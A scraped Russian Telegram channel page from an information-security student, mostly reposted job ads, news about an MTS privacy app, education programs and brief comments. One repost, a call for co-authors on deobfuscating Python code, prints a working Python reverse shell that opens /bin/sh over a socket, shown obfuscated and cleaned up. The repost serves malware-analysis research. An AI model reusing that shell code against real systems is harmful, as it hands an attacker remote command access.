Студент-безопасник live


Гео и язык канала: Россия, Русский
Категория: Образование


Все, что происходит в жизни

Связанные каналы

Гео и язык канала
Россия, Русский
Категория
Образование
Статистика
Фильтр публикаций


длиннющая реклама мембраны на розеткеде


Репост из: 42 секунды
Forbes: МТС запускает приложение Membrana для управления связью и приватностью

– МТС запускает новый тариф с отдельным приложением Membrana
– Membrana позволяет управлять вызовами и приватностью в сети
– Клиент защитит себя от рекламы, мошенников, утечек данных и др.
– Встроенный ИИ-секретарь способен приоритезировать звонки
– Рутинные беседы ИИ-секретарь может взять полностью на себя
– Алгоритмы Membrana могут выявлять подозрительные сайты
– Также есть решение для блокировки навязчивой рекламы и др.
– Membrana отслеживает внешние источники с данными из утечек
– Приложение МТС поможет устранить нарушения приватности
– Подписка на сервис Membrana будет стоить 1900 руб./мес.
– Выручка Membrana по итогам 2025 может быть 6-7 млрд руб.
– До 2030 показатель может вырасти уже до 30-35 млрд руб.
– Его аудитория может составить 100-150 тыс. пользователей
– Продукт Membrana могут также запустить для корп. сегмента

@ftsec


Теперь и взрослое приложение




Репост из: Future Crew
Вакансии в команде CICADA8

Наша CICADA8 — это платформа, которая делает бизнес безопаснее, отслеживая кибергурозы в реальном времени. Только за последний год с помощью неё мы предотвратили рисков на 2 млрд рублей.

Поскольку CICADA8 — сервис централизованного управления уязвимостями внешнего периметра с экспертным сопровождением, мы регулярно расширяем команду и ищем новых экспертов. Вот актуальные вакансии:

Reverse engineer 🛸

Чем предстоит заниматься: ревёрс вредоносного ПО, извлечение адресов C&C и иных сетевых индикаторов, написание YARA-правил и скриптов для детекта малвари на стороне клиента.
Подробности здесь 👈

Middle/Senior Penetration tester 🛸

Чем предстоит заниматься: проводить внешнее и внутреннее тестирование на проникновение, анализ защищённости приложения методами белого/серого/чёрного ящика, участие в Red-Team-проектах.
Подробности здесь 👈

Архитектор ИБ 🛸

Чем предстоит заниматься: руководство проектами консалтинга: определение плана работ, постановка задач исполнителям, согласование и защита результатов с заказчиками, проведение комплексных аудитов ИБ клиентов, проведение оценки рисков, разработка стратегий ИБ, разработка рекомендаций и консалтинг по выбору оптимальных способов обработки рисков.
Подробности здесь 👈

Аудитор ИБ 🛸

Чем предстоит заниматься: проводить комплексные аудиты ИБ клиентов, оценивать риски, разрабатывать стратегии ИБ, рекомендации и консалтинг по выбору оптимальных способов обработки рисков ИБ.
Подробности здесь 👈


Сервис-менеджер 🛸

Чем предстоит заниматься: вести существующую клиентскую базу и оказывать помощь в привлечении новых клиентов на платформу CICADA8, взаимодействовать с командой разработки с целью создания «доставки» болей заказчика, разбираться в работе информационных систем при помощи инженеров и аналитиков, курировать процесс выработки услуг в рамках рамочных договоров, контролировать SLA по предоставлению сервиса и повышать удовлетворённость пользователей платформы.
Подробности здесь 👈


Руководитель проекта 🛸

Чем предстоит заниматься: управлением проектами по ИБ — консалтингом, пентестом, форензикой; ресурсным планированием отделов под разные по длине и сложности проекты (от двух недель до шести месяцев), общением с клиентами в рамках предоставления договорных материалов и запросов; мониторингом сроков заключения договоров; построением и оптимизацией процессов управления ресурсами и проектами в рамках направления на 50–70 человек.
Подробности здесь 👈

Если в какой-то из вакансий мы описали вас, то смело откликайтесь 🤗


Это для студентов с опытом уже

(могу пореферить)


Репост из: Quantum Crypto
Видео недоступно для предпросмотра
Смотреть в Telegram
🔑 Симулятор квантового распределения ключей — ViPNet QKDSim на ИТ-форуме в Ханты-Мансийске

ViPNet QKDSim наглядно демонстрирует принципы квантового распределения ключей, основанного на генерации и детектировании (считывании) оптических информационных состояний.

В процессе симуляции участвуют 3 объекта: передатчик (Алиса), приемник (Боб) и злоумышленник (Ева). Информация в оптических состояниях кодируется и декодируется путем изменения параметров поляризации генерируемого светового потока, интерпретируемых как параметры различных протоколов КРК.


Репост из: Positive Technologies
👩‍🎓 Positive Technologies и Тинькофф объединяют усилия и запускают совместные образовательные программы для восполнения кадрового дефицита в отрасли

💬 «Мы понимаем, что будущее не только кибербезопасности, но и всей сферы IT зависит от тех, кто приходит в нее сейчас, и у нас есть уникальная возможность повлиять на развитие отрасли», — отметил Денис Баранов, генеральный директор Positive Technologies.

Обучение будет проходить на базе Центрального университета — первого STEM-вуза в России. В программах примут участие эксперты из разных технологических компаний, чтобы слушатели смогли получить максимально широкий спектр практических навыков.

🤌 Первым в серии образовательных программ стартует курс по подготовке специалистов SOC. Он начнется 16 февраля и продлится шесть месяцев.

• Обучение рассчитано на студентов последних курсов направлений IT и ИБ, которые проходили стажировки или имеют небольшой опыт работы в сфере ИБ.

• Кроме того, курс будет полезен аналитикам первой линии SOC, желающим прокачать свои навыки в области анализа и поиска угроз.

• Подать заявку на обучение можно до 10 февраля на сайте программы.

Выпускники получат диплом о профессиональной переподготовке от Центрального университета и возможность претендовать на вакансии в крупнейших компаниях России.

🤫 Небольшой спойлер: в этом году совместно с Тинькофф мы также планируем запустить магистратуру по ИБ. Но об этом расскажем позднее.

Да пребудут с нами знания!

#PositiveEducation
@Positive_Technologies


✋Магистратура по иб от Газпрома
👉Магистратура по иб от тинька + позитивов


Репост из: RuSecJobs Channel
Infra Security Intern, Wildberries

ЗП: 40 000 - 100 000 тыс. рублей net
Уровень: Intern
Формат: удаленка или гибрид

Команды информационной безопасности продолжают разыскивать начинающих специалистов.
Мы приглашаем студентов и выпускников технических ВУЗов по направлению ИБ рассмотреть стажировку в InfraSec.

Чем предстоит заниматься:
• Участие в процессах Vulnerability management
• Работа с инфраструктурными сканерами уязвимостей
• Оценкой критичности уязвимостей и проработка рекомендаций по устранению
• Разработка собственных правил под сканеры

Для этого нужно:
• Понимание природы уязвимостей и как они возникают
• Опыт работы со сканерами
• Понимание базовых принципов работы ОС Linux и опыт работы с основными инструментами ОС (обработка текста, работа со службами и пр.)
• Знание модели OSI и принципов работы основных сетевых протоколов
• Знание на уровне простого скриптинга или автоматизации задач одного из языков: Python, C, C++, C#, bash, GO

Будет плюсом:
• Участие в CTF
• Наличие pet-проектов, связанных с Linux-based системами

Мы предлагаем:
• Полугодовая оплачиваемая стажировка, которая даст возможность получить ценный опыт и практические навыки в области информационной безопасности
• Опыт работы в команде, состоящей из экспертов, готовых делиться своими знаниями и навыками
• Возможность после завершения стажировки присоединиться к нам в качестве полноценного участника команды безопасности
• Пятидневная рабочая неделя с возможностью выбрать занятость - 20/30/40 часов
• Оформление по самозанятости

Какие шаги нужно предпринять, чтобы попасть на стажировку:
• Отправить резюме рекрутеру
• Успешно выполнить тестовое задание, доказывающее понимание основных принципов безопасности
• Пройти интервью с будущими ментором и руководителем и продемонстрировать свои знания и мотивацию
• Важно быть готовым завершить стажировку и перейти на 40-часовую неделю в штат 😉

Контакты: Ирина @wb_stazhirovka


Просто два отзыва рядом


Репост из: disasm.me channel
#вак #статьи

Ищу аспирантов, академических исследователей и просто студентов, которые хотят впрячься в соавторство для написания ваковских статей (?).

Скоро начну ресёрч по общей теме "Восстановление контекста имён после воздействия обфускаторов кода", он будет посвящен восстановлению названий переменных, функций и классов (всё это "names" в понимании питона) после воздействия на них обфускаторов типа oxypy:

До:
import socket, os, pty
def O00OO000O0000OOOO(OOO0OOO0O0000OOO0, OO0OO0O0OO0OO00O0):
OOOO0OOOO0OOO0O00 = socket.socket()
OOOO0OOOO0OOO0O00.connect((OOO0OOO0O0000OOO0, OO0OO0O0OO0OO00O0))
[os.dup2(OOOO0OOOO0OOO0O00.fileno(),O0O00O0O00O000O00) for O0O00O0O00O000O00 in (0, 1, 2)]
pty.spawn ("/bin/sh")

if __name__ == "__main__":
O00OO000O0000OOOO("127.0.0.1",8080)

После:
import socket,os,pty

def main(host, port):
s=socket.socket()
s.connect((host, port))
[os.dup2(s.fileno(), fd) for fd in (0,1,2)]
pty.spawn("/bin/sh")

if __name__ == "__main__":
main("127.0.0.1", 8080)

Решаемая задача: борьба с обфускацией в малвари в контексте Python

Чем будем заниматься:
- Анализировать опенсорс (в том числе эксплоиты и малварь) для того, чтобы получить статистическую модель названий переменных, функций, классов и методов в зависимости от условий, присваиваемых значений, передаваемых переменных и применять ее на обфусцированный код
- Сравнивать различные обфускаторы, которые могут в переименование имён (oxypy, pyminifier) и самописный (который будет создаваться с учётом опыта, полученного при анализе опенсорса, и позволит оценить результат прошлого пункта) и натравливать их на нашу модель для получения статы
- Потехи ради посмотреть, как ML может помочь в решении этой задачи (по факту тренировочные данные можно генерировать до бесконечности, ведь примеров кода много, а получать его обфусцированную версию очень просто)

Собственно, это выльется в несколько ВАК-публикаций и как минимум одно выступление на конференциях по ИБ/Python. Ищу уверенных в себе питонистов, которым будет интересно исследовать эту тему, так как эту тему судя по elibrary никто не брал, хотя сама идея лежит на поверхности. Кому интересно подискутировать - welcome to comments.


А зачем скрилексу проверять мои знания?


Ну ладно, такие стейт-контроллед медиа можно потерпеть


Хм


Репост из: white2hack 📚
Карта российского рынка информационной безопасности 2023

На карте отмечено 230 отечественных компаний-разработчиков продуктов и поставщиков услуг в сфере ИБ, актуальных на 2023 год. В ходе подготовки карты такие решения были сегментированы по 42 категориям в 4 основных группах: «Защита инфраструктуры», «Мониторинг, исследование и анализ», «Защита данных» и «Услуги и сервисы».

Источник + комментарий
Карта в HD (JPEG)

#analytics


Репост из: The After Times
Видео недоступно для предпросмотра
Смотреть в Telegram


ого, и десяти лет не прошло


Все, я с концами разобрался, это два акка LTT. Они там че то делают со скрытием видео, поэтому не совсем понятно было.


Помимо Теслы вообще говоря оказался сломан один из акков LTT (это именно он на скрине выше)

Показано 20 последних публикаций.

58

подписчиков
Статистика канала